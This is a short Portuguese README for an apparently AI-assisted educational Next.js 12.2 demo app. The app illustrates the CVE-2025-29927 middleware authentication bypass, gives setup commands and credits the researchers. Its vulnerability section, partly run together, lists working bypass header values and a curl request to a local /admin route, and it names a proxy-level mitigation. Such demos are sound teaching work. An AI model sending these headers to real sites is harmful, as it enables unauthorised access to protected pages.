
🔓 Next.js Auth Bypass Demo - Aplicativo educacional que demonstra a vulnerabilidade de bypass de autenticação de middleware CVE-2025-29927. ⚠️ Apenas para uso educacional. [Feito usando IA]
Uma aplicação simples de prova de conceito Next.js 12.2.
npm install
npm run dev
A aplicação estará disponível em http://localhost:3000
npm run dev - Iniciar servidor de desenvolvimentonpm run build - Compilar para produçãonpm run start - Iniciar servidor de produçãoEdite pages/index.js para modificar a página Olá Mundo. A aplicação usa estilos inline para simplicidade, mas você pode adicionar arquivos CSS ou bibliotecas de estilização conforme necessário.
Esta aplicação demonstra a vulnerabilidade CVE-2025-29927 descoberta por Rachid.A (zhero) e Yasser Allam (inzo_):
x-middleware-subrequestadminadminx-middleware-subrequest: middlewarecurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest no nível do proxy/CDN⚠️ AVISO: Isto demonstra um CVE real apenas para fins educacionais!
Esta aplicação usa estilos inline para simplicidade. Para uma aplicação de produção, considere usar:
Bom código! 🚀